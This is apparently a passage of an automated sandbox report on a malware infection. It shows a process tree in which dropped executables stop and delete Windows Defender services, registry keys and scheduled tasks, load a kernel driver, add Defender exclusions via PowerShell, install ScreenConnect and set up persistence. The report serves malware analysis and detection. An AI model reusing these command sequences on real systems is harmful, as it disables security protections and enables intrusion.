                                              PID:5772
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                              11⤵
                                                PID:6072
                                              • C:\Windows\system32\sc.exe
                                                sc stop "WdNisDrv"
                                                11⤵
                                                • Launches sc.exe
                                                PID:4372
                                              • C:\Windows\system32\sc.exe
                                                sc delete "WdNisDrv"
                                                11⤵
                                                • Launches sc.exe
                                                PID:5448
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                11⤵
                                                  PID:2248
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "WdBoot"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:5144
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "WdBoot"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:548
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                  11⤵
                                                    PID:5988
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "WdFilter"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:3764
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "WdFilter"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:3304
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                    11⤵
                                                      PID:4496
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "SgrmAgent"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:2184
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "SgrmAgent"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:1400
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                      11⤵
                                                        PID:2368
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop "MsSecWfp"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:2840
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete "MsSecWfp"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:5544
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                        11⤵
                                                          PID:4376
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop "MsSecFlt"
                                                          11⤵
                                                          • Launches sc.exe
                                                          PID:5532
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete "MsSecFlt"
                                                          11⤵
                                                            PID:1624
                                                          • C:\Windows\system32\reg.exe
                                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                            11⤵
                                                              PID:396
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop "MsSecCore"
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:4792
                                                            • C:\Windows\system32\sc.exe
                                                              sc delete "MsSecCore"
                                                              11⤵
                                                                PID:4852
                                                              • C:\Windows\system32\reg.exe
                                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                                11⤵
                                                                  PID:5860
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                  11⤵
                                                                    PID:4296
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                    11⤵
                                                                      PID:456
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                      11⤵
                                                                        PID:2600
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                        11⤵
                                                                          PID:5276
                                                                        • C:\Windows\system32\sc.exe
                                                                          sc stop ddrver
                                                                          11⤵
                                                                          • Launches sc.exe
                                                                          PID:2776
                                                                        • C:\Windows\system32\sc.exe
                                                                          sc delete ddrver
                                                                          11⤵
                                                                          • Launches sc.exe
                                                                          PID:6112
                                                              • C:\Users\Admin\AppData\Local\Temp\10375600101\A9cowK5.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10375600101\A9cowK5.exe"
                                                                6⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3712
                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"
                                                                  7⤵
                                                                  • Enumerates connected drives
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:6008
                                                              • C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Adds Run key to start application
                                                                PID:2008
                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                  cmd.exe /c 67e8f4de3ad1d.vbs
                                                                  7⤵
                                                                  • Checks computer location settings
                                                                  • Modifies registry class
                                                                  PID:1888
                                                                  • C:\Windows\System32\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"
                                                                    8⤵
                                                                      PID:5600
                                                                • C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe"
                                                                  6⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3068
                                                                  • C:\Users\Admin\AppData\Local\Temp\221.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\221.exe"
                                                                    7⤵
                                                                    • Checks computer location settings
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:4376
                                                                    • C:\Windows\system32\cmd.exe
                                                                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\13C2.tmp\13C3.tmp\13C4.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
                                                                      8⤵
                                                                        PID:4792
                                                                        • C:\Users\Admin\AppData\Local\Temp\221.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\221.exe" go
                                                                          9⤵
                                                                          • Checks computer location settings
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:5416
                                                                          • C:\Windows\system32\cmd.exe
                                                                            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\143F.tmp\1440.tmp\1441.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
                                                                            10⤵
                                                                            • Drops file in Program Files directory
                                                                            PID:3316
                                                                            • C:\Windows\system32\sc.exe
                                                                              sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                                                              11⤵
                                                                                PID:2740
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc start ddrver
                                                                                11⤵
                                                                                • Launches sc.exe
                                                                                PID:3808
                                                                              • C:\Windows\system32\timeout.exe
                                                                                timeout /t 1
                                                                                11⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:4524
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc stop ddrver
                                                                                11⤵
                                                                                • Launches sc.exe
                                                                                PID:3980
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc start ddrver
                                                                                11⤵
                                                                                • Launches sc.exe
                                                                                PID:2848
                                                                              • C:\Windows\system32\takeown.exe
                                                                                takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                                                                11⤵
                                                                                • Possible privilege escalation attempt
                                                                                • Modifies file permissions
                                                                                PID:4932
                                                                              • C:\Windows\system32\icacls.exe
                                                                                icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                                                                11⤵
                                                                                • Possible privilege escalation attempt
                                                                                • Modifies file permissions
                                                                                PID:1008
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc stop "WinDefend"
                                                                                11⤵
                                                                                  PID:2012
                                                                                • C:\Windows\system32\sc.exe
                                                                                  sc delete "WinDefend"
                                                                                  11⤵
                                                                                  • Launches sc.exe
                                                                                  PID:4568
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                                                                  11⤵
                                                                                    PID:5020
                                                                                  • C:\Windows\system32\sc.exe
                                                                                    sc stop "MDCoreSvc"
                                                                                    11⤵
                                                                                    • Launches sc.exe
                                                                                    PID:2760
                                                                                  • C:\Windows\system32\sc.exe
                                                                                    sc delete "MDCoreSvc"
                                                                                    11⤵
                                                                                    • Launches sc.exe
                                                                                    PID:6096
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                                                                    11⤵
                                                                                      PID:3700
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      sc stop "WdNisSvc"
                                                                                      11⤵
                                                                                      • Launches sc.exe
                                                                                      PID:4172
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      sc delete "WdNisSvc"
                                                                                      11⤵
                                                                                      • Launches sc.exe
                                                                                      PID:2264
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                                                                      11⤵
                                                                                        PID:4988
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc stop "Sense"
                                                                                        11⤵
                                                                                        • Launches sc.exe
                                                                                        PID:3540
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc delete "Sense"
                                                                                        11⤵
                                                                                        • Launches sc.exe
                                                                                        PID:1364
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                                                                        11⤵
                                                                                          PID:3504
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc stop "wscsvc"
                                                                                          11⤵
                                                                                          • Launches sc.exe
                                                                                          PID:5916
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc delete "wscsvc"
                                                                                          11⤵
                                                                                            PID:4908
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                                                                            11⤵
                                                                                              PID:2932
                                                                                            • C:\Windows\system32\sc.exe
                                                                                              sc stop "SgrmBroker"
                                                                                              11⤵
                                                                                              • Launches sc.exe
                                                                                              PID:2452
                                                                                            • C:\Windows\system32\sc.exe
                                                                                              sc delete "SgrmBroker"
                                                                                              11⤵
                                                                                              • Launches sc.exe
                                                                                              PID:2204
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                                                                              11⤵
                                                                                                PID:5900
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc stop "SecurityHealthService"
                                                                                                11⤵
                                                                                                • Launches sc.exe
                                                                                                PID:4940
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc delete "SecurityHealthService"
                                                                                                11⤵
                                                                                                  PID:5008
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                                                                                  11⤵
                                                                                                    PID:4784
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop "webthreatdefsvc"
                                                                                                    11⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:2564
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc delete "webthreatdefsvc"
                                                                                                    11⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:2412
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                                                                                    11⤵
                                                                                                      PID:6064
                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                      sc stop "webthreatdefusersvc"
                                                                                                      11⤵
                                                                                                        PID:1288
                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                        sc delete "webthreatdefusersvc"
                                                                                                        11⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:4116
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                                                                                        11⤵
                                                                                                          PID:5376
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          sc stop "WdNisDrv"
                                                                                                          11⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:2380
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          sc delete "WdNisDrv"
                                                                                                          11⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:6056
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                                                                          11⤵
                                                                                                            PID:2780
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc stop "WdBoot"
                                                                                                            11⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:3488
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc delete "WdBoot"
                                                                                                            11⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:5956
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                                                                            11⤵
                                                                                                              PID:3400
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              sc stop "WdFilter"
                                                                                                              11⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:5596
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              sc delete "WdFilter"
                                                                                                              11⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:5664
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                                                                              11⤵
                                                                                                                PID:4404
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc stop "SgrmAgent"
                                                                                                                11⤵
                                                                                                                  PID:5608
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  sc delete "SgrmAgent"
                                                                                                                  11⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:3776
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                                                                                  11⤵
                                                                                                                    PID:904
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc stop "MsSecWfp"
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:1184
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc delete "MsSecWfp"
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:3852
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                                                                                    11⤵
                                                                                                                      PID:2620
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      sc stop "MsSecFlt"
                                                                                                                      11⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:1180
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      sc delete "MsSecFlt"
                                                                                                                      11⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:5744
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                                                                                      11⤵
                                                                                                                        PID:1744
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc stop "MsSecCore"
                                                                                                                        11⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:2768
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc delete "MsSecCore"
                                                                                                                        11⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:5848
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                                                                                        11⤵
                                                                                                                          PID:392
                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                                                                          11⤵
                                                                                                                            PID:1392
                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                                                                            11⤵
                                                                                                                              PID:4580
                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                                                                              11⤵
                                                                                                                                PID:2684
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                                                                                11⤵
                                                                                                                                  PID:5372
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc stop ddrver
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:1720
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc delete ddrver
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:1196
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe"
                                                                                                                        6⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Drops file in Windows directory
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:2648
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                                                                                          7⤵
                                                                                                                          • Downloads MZ/PE file
                                                                                                                          • Checks computer location settings
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Adds Run key to start application
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:3700
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
                                                                                                                            8⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:5028
                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                              9⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:4728
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                                                                                                                            8⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1600
                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                              9⤵
                                                                                                                                PID:4904
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:2776
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                9⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:2060
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:5872
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-9SMCE.tmp\Bell_Setup16.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-9SMCE.tmp\Bell_Setup16.tmp" /SL5="$B01E8,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                                                                                                                                9⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                • Executes dropped EXE
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:1288
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                                                                                                                                  10⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:6120
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-0QSUM.tmp\Bell_Setup16.tmp
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-0QSUM.tmp\Bell_Setup16.tmp" /SL5="$100316,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                                                                                                                                    11⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    PID:2560
                                                                                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                      "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
                                                                                                                                      12⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:4668
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
                                                                                                                                        13⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:2768
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
                                                                                                                                        "PowerShell.exe" -NoProfile -NonInteractive -Command -
                                                                                                                                        13⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:1900
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
                                                                                                                                        13⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        PID:5560
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2904
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
                                                                                                                                9⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                PID:6260
                                                                                                                              • C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
                                                                                                                                C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
                                                                                                                                9⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4348
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
                                                                                                                                  10⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  PID:6912
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10045200101\1e1f6ba714.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10045200101\1e1f6ba714.exe"
                                                                                                                              8⤵
                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Identifies Wine through registry keys
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:6352
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10045200101\1e1f6ba714.exe"
                                                                                                                                9⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:7164
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10045210101\9780895aea.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10045210101\9780895aea.exe"
                                                                                                                              8⤵
                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Identifies Wine through registry keys
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:6524
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10045210101\9780895aea.exe"
                                                                                                                                9⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5600
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10045220101\e1f29b94e9.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10045220101\e1f29b94e9.exe"
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:6840
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10380550101\3ebec39cda.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10380550101\3ebec39cda.exe"
                                                                                                                          6⤵
                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Identifies Wine through registry keys
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:452
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe"
                                                                                                                          6⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          • Drops startup file
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Adds Run key to start application
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:5092
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe'
                                                                                                                            7⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:1000
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NP4kBrG.exe'
                                                                                                                            7⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:1536
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\smss.exe'
                                                                                                                            7⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:4668
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'smss.exe'
                                                                                                                            7⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
